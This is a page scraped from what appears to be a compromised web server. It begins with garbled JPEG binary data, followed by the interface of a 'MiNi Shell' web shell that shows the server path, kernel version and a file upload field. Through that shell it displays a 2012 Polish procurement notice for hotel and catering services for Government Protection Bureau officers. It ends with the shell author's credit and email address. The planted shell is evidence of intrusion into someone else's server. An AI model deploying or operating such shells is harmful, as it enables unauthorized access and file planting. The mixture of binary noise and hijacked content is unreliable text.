JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/54653-N-2012.html

<p class="kh_header"><b>Warszawa: Usługa: - zakwaterowania funkcjonariuszy Biura Ochrony Rządu; -wyżywienia funkcjonariuszy Biura Ochrony Rządu</b><br>
<b>Numer ogłoszenia: 54653 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Biuro Ochrony Rządu , ul. Podchorążych 38, 00-463 Warszawa, woj. mazowieckie, tel. 22 6065404, faks 22 6065408.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bor.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PAŃSTWOWA JEDNOSTKA BUDŻETOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa: - zakwaterowania funkcjonariuszy Biura Ochrony Rządu; -wyżywienia funkcjonariuszy Biura Ochrony Rządu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa hotelarsko - restauracyjna (gastronomiczna) dla 72 osób realizowana w terminach i miastach: 
1.	Część I - w m. Poznań od 07.06.2012 r. do 19.06.2012 r. - 24 osoby.
2.	 Część II - w m. Wrocław od 07.06.2012 r. do 17.06.2012 r. - 24 osoby.
3.	Część III - w m. Gdańsk od 07.06.2012 r. do 23.06.2012 r. - 24 osoby.


Usługa musi być zrealizowana w obiektach hotelowych kategorii minimum *** (trzy gwiazdki) w myśl ustawy z dnia 29 sierpnia 1997 roku o usługach turystycznych (Dz. U. z 2004 r. nr 223 poz. 2268 ze zm.), zlokalizowanych w odległości nie większej niż 50 km od:
- centrum m. Poznań dla części I,
- centrum m. Wrocław dla części II,
- centrum m. Gdańsk dla części III,
zwanych dalej Punktami Zero. Do weryfikacji podanej odległości, o której mowa w zdaniu poprzednim Zamawiający posłuży się usługą Lokalizatora Internetowego Zumi, dostępną pod adresem, www.zumi.pl, w zakładce Wyznaczanie trasy, parametry: Własna trasa oraz Jadę autem. Weryfikacja dokonana przez Zamawiającego w wyżej wymieniony sposób będzie traktowana jako ostateczna.

Ilość miejsc hotelowych, którymi dysponuje Wykonawca w pojedynczym obiekcie branym pod uwagę jako miejsce świadczenia przedmiotowej usługi i którą to ilość będzie musiał zaoferować w ofercie to 24 miejsca w pokojach jedno- i dwuosobowych. Pod pojęciem obiekt Zamawiający rozumie budynek lub kompleks budynków umiejscowionych na jednym terenie, posiadający ten sam numer porządkowy nieruchomości. 

Dodatkowo Wykonawca będzie zobowiązany zapewnić do dyspozycji Zamawiającego salę konferencyjną do przeprowadzenia spotkań dla 24 osób. 
Usługa gastronomiczna składająca się co najmniej z posiłków: śniadanie i obiadokolacja, musi być świadczona dla wszystkich miejsc hotelowych ujętych w ofercie. Usługa gastronomiczna musi być świadczona w tym samym obiekcie, w którym będą zakwaterowani funkcjonariusze Zamawiającego. 

Wykonawcy składając wnioski o dopuszczenie do udziału w postępowaniu zobowiązani będą 
do podania odległości obiektów hotelowych z dokładnością do 100 m, w których będzie świadczona przedmiotowa usługa od Punktu Zero. Zamawiający dokona oceny odległości i przyzna wszystkim wykonawcom spełniającym warunki udziału w postępowaniu oraz niepodlegającym wykluczeniu z postępowania, punkty za odległość (od 1 do n, gdzie n oznacza liczbę złożonych, ważnych wniosków o dopuszczenie do udziału w postępowaniu) według zasady, że największą liczbę punktów otrzyma Wykonawca, którego obiekt jest najbliżej Punktu Zero, natomiast jeden punkt otrzyma Wykonawca, którego obiekt jest najdalej od Punktu Zero..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 07.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Usługa musi być zrealizowana w obiektach hotelowych kategorii minimum *** (trzy gwiazdki) w myśl ustawy z dnia 29 sierpnia 1997 roku o usługach turystycznych (Dz. U. z 2004 r. nr 223 poz. 2268 ze zm.), zlokalizowanych w odległości nie większej niż 50 km od:
- centrum m. Poznań dla części I,
- centrum m. Wrocław dla części II,
- centrum m. Gdańsk dla części III,
zwanych dalej Punktami Zero. Do weryfikacji podanej odległości, o której mowa w zdaniu poprzednim Zamawiający posłuży się usługą Lokalizatora Internetowego Zumi, dostępną pod adresem, www.zumi.pl, w zakładce Wyznaczanie trasy, parametry: Własna trasa oraz Jadę autem. Weryfikacja dokonana przez Zamawiającego w wyżej wymieniony sposób będzie traktowana jako ostateczna.
Ilość miejsc hotelowych, którymi dysponuje Wykonawca w pojedynczym obiekcie branym pod uwagę jako miejsce świadczenia przedmiotowej usługi i którą to ilość będzie musiał zaoferować w ofercie to 24 miejsca w pokojach jedno- i dwuosobowych. Pod pojęciem obiekt Zamawiający rozumie budynek lub kompleks budynków umiejscowionych na jednym terenie, posiadający ten sam numer porządkowy nieruchomości. 
Dodatkowo Wykonawca będzie zobowiązany zapewnić do dyspozycji Zamawiającego salę konferencyjną do przeprowadzenia spotkań dla 24 osób. 
Usługa gastronomiczna składająca się co najmniej z posiłków: śniadanie i obiadokolacja, musi być świadczona dla wszystkich miejsc hotelowych ujętych w ofercie. Usługa gastronomiczna musi być świadczona w tym samym obiekcie, w którym będą zakwaterowani funkcjonariusze Zamawiającego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> negocjacje z ogłoszeniem.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 4.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>W przypadku, gdy liczba Wykonawców spełniających warunki zawarte w ogłoszeniu przekroczy 4, Zamawiający przyzna odpowiednią ilość punktów Wykonawcy za odległość obiektu hotelowego, w którym będzie świadczona przedmiotowa usługa od Punktu Zero. Zamawiający dokona oceny odległości i przyzna wszystkim Wykonawcom spełniającym warunki udziału w postępowaniu oraz niepodlegającym wykluczeniu z postępowania, punkty za odległość (od 1 do n, gdzie n oznacza liczbę złożonych, ważnych wniosków o dopuszczenie do udziału w postępowaniu) według zasady, że największą liczbę punktów otrzyma Wykonawca, którego obiekt jest najbliżej Punktu Zero, natomiast jeden punkt otrzyma Wykonawca, którego obiekt jest najdalej od Punktu Zero. 
Zamawiający zaprosi do składania ofert wstępnych czterech Wykonawców, którzy uzyskali największą liczbę punktów za odległość obiektu hotelowego od Punktu Zero. W przypadku uzyskania przez Wykonawców jednakowej ilości punktów powodującej przekroczenie liczby Wykonawców, którą Zamawiający wskazał w ogłoszeniu, do złożenia ofert zostaną zaproszeni wszyscy ci Wykonawcy, którzy uzyskali jednakową ilość punktów</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Czas dojazdu z hotelu do Punktu Zero - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jarosław GROTOWSKI, Warszawa, Miłobędzka 38 tel. (0-22) 606 54 56, fax. (0-22) 606 54 08.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 13:00, miejsce: Biuro Ochrony Rządu, 00-463 Warszawa, 
ul. Podchorążych 38,budynek nr 1, część B, pok. 7 (Kancelaria ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wniosek o dopuszczenie do udziału w postępowaniu należy złożyć (przesłać) w  terminie do 16.03.2012 r., godz. 13:00 na adres Zamawiającego t.j. Biuro Ochrony Rządu - Kancelaria Ogólna, ul. Podchorążych 38, budynek nr 1, 
część B, pokój nr 7, 00-463 Warszawa.
Wniosek powinien być sporządzony w języku polskim w sposób czytelny  i powinien być podpisany przez osobę (osoby) mającą prawo do reprezentowania Wykonawcy. Wniosek mogą podpisać także inne osoby posiadające pełnomocnictwo do reprezentowania Wykonawcy, które to pełnomocnictwo należy dołączyć do wniosku w oryginale lub poświadczonej notarialnie kopii. Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem wniosku.
Wszelkie poprawki, zmiany, przekreślenia w tekście Wniosku powinny być parafowane przez osobę podpisującą wniosek.
Pozostałe zawiadomienia i informacje Zamawiający i Wykonawcy przekazują faksem. W tym przypadku każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
Zawsze dopuszczalna jest forma pisemna. 
Wzór formularza wniosku o dopuszczenie do udziału w postępowaniu znajduje się na stronie internetowej: http:www.bor.gov.pl w zakładce Zamówienia Publiczne i Logistyka - Wszczęte - sprawa 4 2012 ZP.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa:
- zakwaterowania funkcjonariuszy Biura Ochrony Rządu;
- wyżywienia funkcjonariuszy Biura Ochrony Rządu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa hotelarsko - restauracyjna (gastronomiczna) dla 24 osób realizowana 
w m. Poznań  w  terminie od 07.06.2012 r. do 19.06.2012 r.
Usługa musi być zrealizowana w obiektach hotelowych kategorii minimum *** (trzy gwiazdki) w myśl ustawy z dnia 29 sierpnia 1997 roku o usługach turystycznych (Dz. U. z 2004 r. nr 223 poz. 2268 ze zm.), zlokalizowanych w odległości nie większej niż 50 km od centrum m. Poznań zwanego dalej Punktem Zero. Do weryfikacji podanej odległości, o której mowa w zdaniu poprzednim Zamawiający posłuży się usługą Lokalizatora Internetowego Zumi, dostępną pod adresem, www.zumi.pl, w zakładce Wyznaczanie trasy, parametry: Własna trasa oraz Jadę autem. Weryfikacja dokonana przez Zamawiającego w wyżej wymieniony sposób będzie traktowana jako ostateczna.

Ilość miejsc hotelowych, którymi dysponuje Wykonawca w pojedynczym obiekcie branym pod uwagę jako miejsce świadczenia przedmiotowej usługi i którą to ilość będzie musiał zaoferować w ofercie to 24 miejsca w pokojach jedno- i dwuosobowych. Pod pojęciem obiekt Zamawiający rozumie budynek lub kompleks budynków umiejscowionych na jednym terenie, posiadający ten sam numer porządkowy nieruchomości. 

Dodatkowo Wykonawca będzie zobowiązany zapewnić do dyspozycji Zamawiającego salę konferencyjną do przeprowadzenia spotkań dla 24 osób. 
Usługa gastronomiczna składająca się co najmniej z posiłków: śniadanie i obiadokolacja, musi być świadczona dla wszystkich miejsc hotelowych ujętych w ofercie. Usługa gastronomiczna musi być świadczona w tym samym obiekcie, w którym będą zakwaterowani funkcjonariusze Zamawiającego. 

Wykonawcy składając wnioski o dopuszczenie do udziału w postępowaniu zobowiązani będą 
do podania odległości obiektów hotelowych z dokładnością do 100 m, w których będzie świadczona przedmiotowa usługa od Punktu Zero. Zamawiający dokona oceny odległości i przyzna wszystkim wykonawcom spełniającym warunki udziału w postępowaniu oraz niepodlegającym wykluczeniu z postępowania, punkty za odległość (od 1 do n, gdzie n oznacza liczbę złożonych, ważnych wniosków o dopuszczenie do udziału w postępowaniu) według zasady, że największą liczbę punktów otrzyma Wykonawca, którego obiekt jest najbliżej Punktu Zero, natomiast jeden punkt otrzyma Wykonawca, którego obiekt jest najdalej od Punktu Zero.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Czas dojazdu z hotelu do Punktu Zero - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa: - zakwaterowania funkcjonariuszy Biura Ochrony Rządu; -wyżywienia funkcjonariuszy Biura Ochrony Rządu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa hotelarsko - restauracyjna (gastronomiczna) dla 24 osób realizowana 
w m. Wrocław  w  terminie od 07.06.2012 r. do 17.06.2012 r.
Usługa musi być zrealizowana w obiektach hotelowych kategorii minimum *** (trzy gwiazdki) w myśl ustawy z dnia 29 sierpnia 1997 roku o usługach turystycznych (Dz. U. z 2004 r. nr 223 poz. 2268 ze zm.), zlokalizowanych w odległości nie większej niż 50 km od centrum m. Wrocław zwanego dalej Punktem Zero. Do weryfikacji podanej odległości, o której mowa w zdaniu poprzednim Zamawiający posłuży się usługą Lokalizatora Internetowego Zumi, dostępną pod adresem, www.zumi.pl, w zakładce Wyznaczanie trasy, parametry: Własna trasa oraz Jadę autem. Weryfikacja dokonana przez Zamawiającego w wyżej wymieniony sposób będzie traktowana jako ostateczna.

Ilość miejsc hotelowych, którymi dysponuje Wykonawca w pojedynczym obiekcie branym pod uwagę jako miejsce świadczenia przedmiotowej usługi i którą to ilość będzie musiał zaoferować w ofercie to 24 miejsca w pokojach jedno- i dwuosobowych. Pod pojęciem obiekt Zamawiający rozumie budynek lub kompleks budynków umiejscowionych na jednym terenie, posiadający ten sam numer porządkowy nieruchomości. 

Dodatkowo Wykonawca będzie zobowiązany zapewnić do dyspozycji Zamawiającego salę konferencyjną do przeprowadzenia spotkań dla 24 osób. 
Usługa gastronomiczna składająca się co najmniej z posiłków: śniadanie i obiadokolacja, musi być świadczona dla wszystkich miejsc hotelowych ujętych w ofercie. Usługa gastronomiczna musi być świadczona w tym samym obiekcie, w którym będą zakwaterowani funkcjonariusze Zamawiającego. 

Wykonawcy składając wnioski o dopuszczenie do udziału w postępowaniu zobowiązani będą 
do podania odległości obiektów hotelowych z dokładnością do 100 m, w których będzie świadczona przedmiotowa usługa od Punktu Zero. Zamawiający dokona oceny odległości i przyzna wszystkim wykonawcom spełniającym warunki udziału w postępowaniu oraz niepodlegającym wykluczeniu z postępowania, punkty za odległość (od 1 do n, gdzie n oznacza liczbę złożonych, ważnych wniosków o dopuszczenie do udziału w postępowaniu) według zasady, że największą liczbę punktów otrzyma Wykonawca, którego obiekt jest najbliżej Punktu Zero, natomiast jeden punkt otrzyma Wykonawca, którego obiekt jest najdalej od Punktu Zero.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Czas dojazdu z hotelu do Punktu Zero - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Usługa: - zakwaterowania funkcjonariuszy Biura Ochrony Rządu; - wyżywienia funkcjonariuszy Biura Ochrony Rządu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa hotelarsko - restauracyjna (gastronomiczna) dla 24 osób realizowana 
w m. Gdańsk  w  terminie od 07.06.2012 r. do 23.06.2012 r.
Usługa musi być zrealizowana w obiektach hotelowych kategorii minimum *** (trzy gwiazdki) w myśl ustawy z dnia 29 sierpnia 1997 roku o usługach turystycznych (Dz. U. z 2004 r. nr 223 poz. 2268 ze zm.), zlokalizowanych w odległości nie większej niż 50 km od centrum m. Gdańsk zwanego dalej Punktem Zero. Do weryfikacji podanej odległości, o której mowa w zdaniu poprzednim Zamawiający posłuży się usługą Lokalizatora Internetowego Zumi, dostępną pod adresem, www.zumi.pl, w zakładce Wyznaczanie trasy, parametry: Własna trasa oraz Jadę autem. Weryfikacja dokonana przez Zamawiającego w wyżej wymieniony sposób będzie traktowana jako ostateczna.

Ilość miejsc hotelowych, którymi dysponuje Wykonawca w pojedynczym obiekcie branym pod uwagę jako miejsce świadczenia przedmiotowej usługi i którą to ilość będzie musiał zaoferować w ofercie to 24 miejsca w pokojach jedno- i dwuosobowych. Pod pojęciem obiekt Zamawiający rozumie budynek lub kompleks budynków umiejscowionych na jednym terenie, posiadający ten sam numer porządkowy nieruchomości. 

Dodatkowo Wykonawca będzie zobowiązany zapewnić do dyspozycji Zamawiającego salę konferencyjną do przeprowadzenia spotkań dla 24 osób. 
Usługa gastronomiczna składająca się co najmniej z posiłków: śniadanie i obiadokolacja, musi być świadczona dla wszystkich miejsc hotelowych ujętych w ofercie. Usługa gastronomiczna musi być świadczona w tym samym obiekcie, w którym będą zakwaterowani funkcjonariusze Zamawiającego. 

Wykonawcy składając wnioski o dopuszczenie do udziału w postępowaniu zobowiązani będą do podania odległości obiektów hotelowych z dokładnością do 100 m, w których będzie świadczona przedmiotowa usługa od Punktu Zero. Zamawiający dokona oceny odległości i przyzna wszystkim wykonawcom spełniającym warunki udziału w postępowaniu oraz niepodlegającym wykluczeniu z postępowania, punkty za odległość (od 1 do n, gdzie n oznacza liczbę złożonych, ważnych wniosków o dopuszczenie do udziału w postępowaniu) według zasady, że największą liczbę punktów otrzyma Wykonawca, którego obiekt jest najbliżej Punktu Zero, natomiast jeden punkt otrzyma Wykonawca, którego obiekt jest najdalej od Punktu Zero.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Czas dojazdu z hotelu do Punktu Zero - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com